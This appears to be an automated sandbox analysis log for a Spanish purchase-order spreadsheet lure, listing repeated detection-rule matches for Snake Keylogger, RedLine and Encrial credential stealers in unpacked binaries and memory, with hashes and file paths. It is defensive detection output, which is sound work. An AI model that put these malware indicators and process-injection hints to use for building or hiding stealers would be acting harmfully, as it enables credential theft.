Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_00D288F0 9_2_00D288F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_00D215F7 9_2_00D215F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_00D215F8 9_2_00D215F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_00D222FF 9_2_00D222FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_00D29EE0 9_2_00D29EE0
Source: Orden de compra 0001-00255454.xlam.xlsx OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: String function: 01010A30 appears 46 times
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: String function: 01339CB3 appears 31 times
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: String function: 0100F9F2 appears 40 times
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: String function: 01350A30 appears 46 times
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: String function: 00FF9CB3 appears 31 times
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: String function: 0134F9F2 appears 40 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: String function: 0040E1D8 appears 44 times
Source: C:\Users\user\AppData\Roaming\negrett.exe Code function: String function: 029DC3A0 appears 34 times
Source: C:\Users\user\AppData\Roaming\negrett.exe Code function: String function: 029EFE30 appears 46 times
Source: sheet1.xml, type: SAMPLE Matched rule: INDICATOR_XML_LegacyDrawing_AutoLoad_Document author = ditekSHen, description = detects AutoLoad documents using LegacyDrawing
Source: 11.2.name.exe.560000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 12.2.RegSvcs.exe.6a5f26.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.RegSvcs.exe.6a5f26.0.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.RegSvcs.exe.6a5f26.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 12.2.RegSvcs.exe.6a5f26.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 9.2.RegSvcs.exe.820000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.RegSvcs.exe.3416458.5.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.RegSvcs.exe.3416458.5.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.RegSvcs.exe.3416458.5.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 12.2.RegSvcs.exe.3416458.5.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 9.2.RegSvcs.exe.820000.2.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.RegSvcs.exe.820000.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.RegSvcs.exe.820000.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 12.2.RegSvcs.exe.c30000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.RegSvcs.exe.c30000.2.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.RegSvcs.exe.c30000.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 12.2.RegSvcs.exe.c30000.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 12.2.RegSvcs.exe.6a503e.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.RegSvcs.exe.6a503e.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.RegSvcs.exe.6a503e.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 12.2.RegSvcs.exe.6a503e.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 12.2.RegSvcs.exe.6a503e.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.RegSvcs.exe.6a503e.1.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.RegSvcs.exe.6a503e.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 12.2.RegSvcs.exe.6a503e.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 12.2.RegSvcs.exe.3415570.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.RegSvcs.exe.3415570.4.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.RegSvcs.exe.3415570.4.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 12.2.RegSvcs.exe.3415570.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 9.2.RegSvcs.exe.820000.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.RegSvcs.exe.820000.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.RegSvcs.exe.820000.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.RegSvcs.exe.820000.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 12.2.RegSvcs.exe.344d370.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.RegSvcs.exe.344d370.3.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.RegSvcs.exe.344d370.3.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 12.2.RegSvcs.exe.344d370.3.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 12.2.RegSvcs.exe.6a5f26.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.RegSvcs.exe.6a5f26.0.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.RegSvcs.exe.6a5f26.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 12.2.RegSvcs.exe.6a5f26.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 8.2.name.exe.7d0000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 9.2.RegSvcs.exe.820ee8.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.RegSvcs.exe.820ee8.1.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.RegSvcs.exe.820ee8.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.RegSvcs.exe.820ee8.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 12.2.RegSvcs.exe.3415570.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.RegSvcs.exe.3415570.4.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.RegSvcs.exe.3415570.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 12.2.RegSvcs.exe.3415570.4.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000008.00000002.779270718.00000000007D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0000000C.00000002.888025081.0000000003411000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000C.00000002.888025081.0000000003411000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0000000B.00000002.817043732.0000000000560000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
